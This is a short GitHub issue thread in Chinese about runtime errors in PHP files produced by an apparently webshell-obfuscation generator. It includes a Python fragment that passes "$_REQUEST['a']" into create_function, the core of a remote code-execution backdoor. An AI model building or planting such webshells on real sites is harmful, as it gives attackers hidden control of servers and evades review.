### ISSUE TITLE
生成的php文件运行报错

### ISSUE THREAD

**Issue by Black-Horse-Git** [Macr0phag3/webshell-bypassed-human#2]
Parse error: syntax error, unexpected '}' in C:\phpstudy_pro\WWW\333.php(15) : runtime-created function on line 1

Fatal error: Function name must be a string in C:\phpstudy_pro\WWW\333.php on line 16

**Comment by Macr0phag3** [comment]
属于 windows 特有问题，待详细排查

**Comment by Black-Horse-Git** [comment]
使用 Linux 编译，使用您给的例子没问题，但是修改python文件如下，也存在同样的错误 

exp = sys.argv[2] if len(sys.argv) == 3 else "$_REQUEST['a']"

payload = 'create_function'+exp

**Comment by Macr0phag3** [comment]
请测试最新版

**Comment by Black-Horse-Git** [comment]
大佬，牛批。
